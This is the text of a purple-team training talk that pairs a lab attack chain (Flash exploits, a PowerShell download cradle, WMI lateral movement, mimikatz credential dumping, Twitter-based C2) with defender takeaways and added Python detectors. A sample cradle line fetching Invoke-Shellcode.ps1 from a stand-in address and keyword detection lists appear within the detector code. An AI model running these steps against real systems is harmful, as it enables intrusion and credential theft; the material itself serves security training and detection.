The recent trend of using Attack and Defense Together.
Due to the recent trend of using offensive and defensive capabilities together, we thought a talk on Purple Teaming would be interesting. We hope it benefits those on the attack side (red team), those on the defensive side (blue team), and those mixing the two.
1. Purple View
The recent trend of using Attack and Defense Together
Not OUR idea - backed by many
@raffertylaura | @haydnjohnson
2. Quick who are we
Haydn Johnson
@haydnjohnson
OSCP
Offensive/Attack Interest
Enjoys presenting
Laura
@raffertylaura
MSc Computer Science (Security/Privacy)
Interested in both sides of security
Loooooves presenting
3. Contents
1. Basic Term Definition
2. Introduction to Red, Blue and Purple
3. Run through of an Attack
○ Gaining Access
○ Lateral Movement
○ Domain Admin
○ Maintaining Access
○ Data Exfiltration
4. For each attack:
○ Attacking View
○ Defenders View
○ Possible Purple Team exercises
4. Definitions
Exploit - The thing used to gain unauthorized access to a system
Payload - What is done after the access is gained (shell, command)
Metasploit - a modular, open source exploit framework
Meterpreter - an advanced, extensible payload that uses in-memory DLL injection
Shell - Gaining Terminal/CMD access remotely
https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/
http://www.metasploit.com/
5. Red Team - Penetration | Offensive
● Scans
● Exploits
● Logic abuse
● Access to things they shouldn’t
6. Blue Team - Block, Prevent, Detect | Defensive
● Logs
● Emails
● Events
● Triggers
● Networking
● More Logs
7. Red Team - Goals
● Model recent threats and trends
● Longer term
● Highlight Gaps in Security Controls, detection etc
● Escape and Evade for Persistence
8. Blue Team - Goals
● Detect Attack
● Respond and Recover
● Produce Actionable Intelligence
● Identify Gaps and investment needs
9. Purple Team - Offensive & Defensive
Working together to achieve the ultimate goal of making the organization more secure
● Exposes blue team to different threats & attacker mindset
● Test incident detection and response
● Allows red team to sharpen skills
● Policy and procedures tested
● Tuning of controls
10. Purple Team - Offensive & Defensive
Different types of Purple Teaming
● Red Team sitting with the Network Defense team
● Adversary Simulation
● Traffic Generation
● cobaltstrike.com
● Wargaming
Requires total picture involving all areas of the organization
11. Purple Team - The difference
● Using Security Posture and Weaknesses to find what is most valuable
● Goal Oriented
● Review attack
● Test how teams use services and how they are managed
12. Purple Team - The difference
● Time to Domain Admin
● Time to Data/Objective
● Time to Respond
● Time to Recover
● Identify where there needs to be more investment
● Measure Impact
Done right, the blue team should come out with better monitoring and response plans.
13. Purple Team - The difference
● Set up a fake scenario - Assume Breach
● How will the attacker gain access?
● Why have they attacked, what do they want?
● How did they move through the network?
● If they exfiltrated data, how?
Do not turn off servers or block IP addresses; keep it realistic
14. Purple Team - Exercise
“In the beginning, it’s easy to challenge and exercise a network defense team. You will find that many network defenders do not have a lot of experience (actively) dealing with a sophisticated adversary.”
- Raphael Mudge
http://blog.cobaltstrike.com/2014/11/12/adversary-simulation-becomes-a-thing/
15. Purple Team - DEMO (step by step)
Our exercise
17. Tools Used
Red Team:
● Kali Linux
● Metasploit
● Meterpreter
● PowerSploit
● Twittor
Blue Team:
● Wireshark
● Windows Event Logs
20. Flash Exploits
● Flash plugins are vulnerable
○ You can embed a javascript/binary within a Flash file
○ ActionScript to define events to redirect to landing page
● Most exploit kit landing pages redirect to pages containing Flash exploits
○ Angler
○ Nuclear
○ Fiesta
● Installed by default in browsers
● New vulnerabilities are identified on almost a weekly basis
30. B: What can you take away
Security Onion: implement it, it is free
It has Snort rules for Flash exploits (they need to be installed)
Confirm whether Flash is needed for business reasons
Keep Flash updated
2811962 - ETPRO TROJAN APT HTTPBrowser dropped by CVE-2015-5119 SSL Cert (trojan.rules)
2811963 - ETPRO TROJAN APT HTTPBrowser dropped by CVE-2015-5119 CnC Beacon (trojan.rules)
https://www.security-database.com/detail.php?alert=CVE-2015-5119
https://security-onion-solutions.github.io/security-onion/
31. Purple Team - Exercise
● Blue team understands how attackers can gain initial access
● Flash exploits - ongoing issue
● Helps blue team to identify suspicious traffic and what is happening from the attacker perspective
● Red team sees how attacks are visible to blue team and thinks of ways to make them more stealthy
37. PowerView
Part of PowerShell Empire
Very advanced
https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
38. A: Lateral Movement
The same local Administrator account passwords on multiple computers.
by Sean Metcalf
https://adsecurity.org/?p=1684
42. A: Base64 Encoding Payload
Remove issues with whitespace
The Hacker Playbook 1 (now 2)
http://thehackerplaybook.com/dashboard/
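From the defender's side, the encoding that removes the attacker's whitespace problems also hides the command from a casual look at a process-creation log. The following is an added example, not code from the talk or from The Hacker Playbook: it decodes a powershell.exe -EncodedCommand argument (base64 of the UTF-16LE script text) and flags cradle keywords. The sample command lines, the keyword list and the 192.0.2.10 address are constructed.

```python
import base64

# Decoded-command keywords a defender would flag; a constructed list, not from the talk.
# The IEX download cradle and Invoke-Shellcode.ps1 are the pieces the deck itself uses.
SUSPICIOUS = ("IEX", "Invoke-Expression", "DownloadString", "Invoke-Shellcode",
              "Net.WebClient", "FromBase64String")

# powershell.exe accepts -EncodedCommand, any prefix of it down to -en, plus -e and -ec.
ENC_FLAGS = {"e", "ec"} | {"encodedcommand"[:i] for i in range(2, 15)}


def decode_encoded_command(cmdline):
    """Return the plaintext of an -EncodedCommand argument, or None if there is none.

    PowerShell expects base64 of the UTF-16LE script text, which is why a captured
    blob that looks like garbage when decoded as UTF-8 is readable this way.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if not tok.startswith(("-", "/")) or tok.lstrip("-/").lower() not in ENC_FLAGS:
            continue
        blob = tokens[i + 1].strip("\"'")
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return None  # the flag is there but the blob is not a well-formed command
    return None


def assess(cmdline):
    """Decode a captured command line and list the suspicious keywords it contains."""
    decoded = decode_encoded_command(cmdline)
    if decoded is None:
        return {"decoded": None, "hits": []}
    hits = [kw for kw in SUSPICIOUS if kw.lower() in decoded.lower()]
    return {"decoded": decoded, "hits": hits}


def encode_for_sample(script):
    """Build a blob the way powershell.exe expects it; used here only to make test input."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed 4688 command lines; 192.0.2.10 is a documentation address standing in for
# the Kali host that serves Invoke-Shellcode.ps1 in the talk.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/Invoke-Shellcode.ps1')"
SAMPLE_CMDLINE = "powershell.exe -NoP -W Hidden -enc " + encode_for_sample(SAMPLE_SCRIPT)
BENIGN_CMDLINE = "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"
```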
43. A: Hosting PowerSploit Invoke-Shellcode.ps1
PowerSploit code hosted on local Kali machine
44. A: Invoke-WmiMethod
Use PowerShell to connect remotely, create a new process and launch the IEX cradle.
Invoke-WmiMethod calls Windows Management Instrumentation (WMI) methods.
The Win32_Process WMI class allows creation of a process.
45. A: Execute Remote command
Execute command from Client1 to tell Client2 to download and execute shellcode
46. A: Client1 gives same password
Same password across multiple clients
54. B: PowerShell connects to Kali
Client2 reaches out to Kali on port 80
55. B: What can you take away
Event Correlation - based on event ID, source and destination for remote connections
Implement alerting based on Security Events together
SIEM can/SHOULD do this
Use Log-MD - a really great logging tool, especially for PowerShell
http://brakeingsecurity.com/2015-042-log_md-more-malware-archaeology-and-sifting-through-the-junk
http://malwarearchaeology.squarespace.com/log-md/
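An added example (not from the talk) of the correlation this slide asks for, applied to the Invoke-WmiMethod lateral movement of slide 44: a remote Win32_Process Create shows up on the target as a PowerShell child of WmiPrvSE.exe (event 4688) shortly after a network logon (event 4624, logon type 3), so pairing the two on the same host surfaces the source machine. The events, host names, addresses and the 60-second window are constructed.

```python
from datetime import datetime, timedelta

# Constructed Windows Security events, flattened the way a SIEM stores them after parsing.
# 4624 = logon (LogonType 3 = network), 4688 = process creation. The parent process name in
# 4688 needs Windows 8.1 / Server 2012 R2 or later; Sysmon event 1 carries the same fields.
EVENTS = [
    {"time": "2016-03-01T22:01:05", "id": 4624, "host": "CLIENT2", "logon_type": 3,
     "user": "Administrator", "src_ip": "10.0.0.11"},
    {"time": "2016-03-01T22:01:09", "id": 4688, "host": "CLIENT2",
     "parent": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "process": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"},
    {"time": "2016-03-01T09:15:00", "id": 4624, "host": "CLIENT1", "logon_type": 2,
     "user": "laura", "src_ip": "-"},
    {"time": "2016-03-01T09:15:30", "id": 4688, "host": "CLIENT1",
     "parent": "C:\\Windows\\explorer.exe",
     "process": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"},
]

WINDOW = timedelta(seconds=60)  # how long after a network logon a process is still tied to it


def _when(ev):
    return datetime.fromisoformat(ev["time"])


def correlate(events, window=WINDOW):
    """Pair each PowerShell started by the WMI provider host (how a remote Win32_Process
    Create shows up on the target) with a network logon on the same host shortly before.
    Returns one alert per pair, carrying the logon's source address for pivoting."""
    logons = [e for e in events if e["id"] == 4624 and e.get("logon_type") == 3]
    alerts = []
    for proc in events:
        if proc["id"] != 4688:
            continue
        if not (proc["parent"].lower().endswith("wmiprvse.exe")
                and proc["process"].lower().endswith("powershell.exe")):
            continue
        for lg in logons:
            delay = (_when(proc) - _when(lg)).total_seconds()
            if lg["host"] == proc["host"] and 0 <= delay <= window.total_seconds():
                alerts.append({"host": proc["host"], "user": lg["user"],
                               "src_ip": lg["src_ip"], "delay_s": int(delay)})
    return alerts


if __name__ == "__main__":
    for a in correlate(EVENTS):
        print("ALERT: WMI-launched PowerShell on %(host)s %(delay_s)ss after network logon "
              "by %(user)s from %(src_ip)s" % a)
```

The local PowerShell on CLIENT1 is left alone because its parent is explorer.exe and the only logon near it is interactive.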
56. Purple Team - Benefits
● Identify ways to move around the network
● Identify and confirm Defensive Controls in Place
● Identify what worked, what did not
● Implement changes
● Justification for resources
58. A: Local Admin to Domain Admin
● Why escalate privileges from Local Admin to Domain Admin?
● Domain admin - control over active directory!
● Access IT resources
● Create accounts
● Propagate malware
59. A: Local Admin to Domain Admin
60. A: Local Admin to Domain Admin
From Client1, map the admin$ share on Client2 and copy over sekurlsa.dll
61. A: Local Admin to Domain Admin
Use psexec to run mimikatz.exe on Client2
62. A: Local Admin to Domain Admin
Use sekurlsa::logonpasswords to dump the Domain Admin logon credentials from
Client2!
67. B: What can you take away
● Prevention:
○ Access control for shared drive
○ Limit access to psexec and monitor use
○ Active Directory best practices
● Detection:
○ IDS signatures
○ SIEM use case - Event correlation between system logs and network proxy logs
○ For lateral movement: enable file level auditing
○ Canary accounts
68. Purple Team - Benefits
● Blue team observes vulnerabilities/threats which may not have been considered
○ Learns how an attacker could escalate privileges from local admin to domain admin
● Red team observes the footprint left behind from this attack and possibly how to minimize it
○ Can identify potential weaknesses in blue team monitoring/response processes
○ Provide more thorough recommendations
77. B: Twittor - Network Traffic
Reaching out to API
Normal User Traffic??
78. B: Twittor - Client system
Backdoor as Python Executable compiled with --no-console flag to hide output
79. B: Traffic from Client
Reaches out to Twitter
Source and destination are internal IPs; it sends to the API
80. B: What can you take away
Check whether there are any remote connections after hours, and whether that is against policy
Again, correlate logs with known C2 addresses
See if AV picks it up
81. Purple Team - Benefits
Test if a C2 can reach out to Twitter.
Social media may be blocked via the browser, but some sites can still be accessed via an API etc.
If it is not blocked, why not? Can your blue team help to stop this and others?
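Added example for slides 80 and 81 (not from the talk or from Twittor): it reads constructed proxy log lines and reports which clients talk to the Twitter API in a way a person would not, by non-browser user agent, after-hours timing, or a fixed polling interval. The log format, the API host list and the 08:00-18:00 policy window are assumptions.

```python
from datetime import datetime, time
from statistics import pstdev

# Constructed proxy log lines: timestamp, client IP, destination host, user agent.
# The first four show a Python-based agent polling the Twitter API at a fixed interval
# outside working hours; the last two are a person browsing during the day.
PROXY_LOG = """\
2016-03-01T23:10:00 10.0.0.12 api.twitter.com python-requests/2.9.1
2016-03-01T23:11:00 10.0.0.12 api.twitter.com python-requests/2.9.1
2016-03-01T23:12:00 10.0.0.12 api.twitter.com python-requests/2.9.1
2016-03-01T23:13:00 10.0.0.12 api.twitter.com python-requests/2.9.1
2016-03-01T14:05:10 10.0.0.20 api.twitter.com Mozilla/5.0 (Windows NT 6.1) Firefox/44.0
2016-03-01T14:07:42 10.0.0.20 www.example.com Mozilla/5.0 (Windows NT 6.1) Firefox/44.0
"""

API_HOSTS = {"api.twitter.com"}         # social-media API endpoints to watch (assumed list)
WORK_HOURS = (time(8, 0), time(18, 0))  # assumed policy window, local time
BROWSER_UA = ("Mozilla/", "Opera/")     # prefixes real browsers send


def parse(log):
    rows = []
    for line in log.splitlines():
        ts, ip, host, ua = line.split(" ", 3)
        rows.append({"time": datetime.fromisoformat(ts), "ip": ip, "host": host, "ua": ua})
    return rows


def findings(log):
    """Group API requests per client and say why each group looks like Twittor-style C2
    rather than a person on the site: non-browser agent, after-hours activity, and a
    near-constant polling interval (a beacon). Clients with no reason are left out."""
    groups = {}
    for r in parse(log):
        if r["host"] in API_HOSTS:
            groups.setdefault((r["ip"], r["host"]), []).append(r)
    out = {}
    for key, rows in groups.items():
        reasons = []
        if not any(r["ua"].startswith(BROWSER_UA) for r in rows):
            reasons.append("non-browser user agent")
        if any(not WORK_HOURS[0] <= r["time"].time() <= WORK_HOURS[1] for r in rows):
            reasons.append("after hours")
        times = sorted(r["time"] for r in rows)
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if len(gaps) >= 3 and pstdev(gaps) < 5:
            reasons.append("regular %.0fs polling interval" % (sum(gaps) / len(gaps)))
        if reasons:
            out[key] = reasons
    return out
```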
91. B: What can you take away?
Disable FTP - there should not really be a business need for it
If there is a business need, whitelist those IP addresses | Create a group of users specifically for FTP
92. Purple Team - Exercise
Clear Text
Will any alarms trigger?
Understand potential holes in alerting
Measure time to detect and respond
94. Purple Team - Reiteration
Provides more value than a Penetration Test
Should be implemented into a regular schedule
Helps train security personnel
Helps make sure your boxes are tuned
95. Limitations and Future Work
● So far we have limited detection tools to Windows Server event logs and Wireshark (and a bit of Snort)
● Could be extended for enterprise security tools such as SIEM/IDS
● Powershell/WMI for blue team
● More advanced attacks, persistence using Powershell Empire
98. Microsoft - 8 minute Video
https://azure.microsoft.com/en-us/documentation/videos/red-vs-blue-internal-security-penetration-testing-of-microsoft-azure/
99. Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
http://www.slideshare.net/beltface/hybrid-talk
100. A: Downloads PowerShell file
Client2 reaches out to Kali machine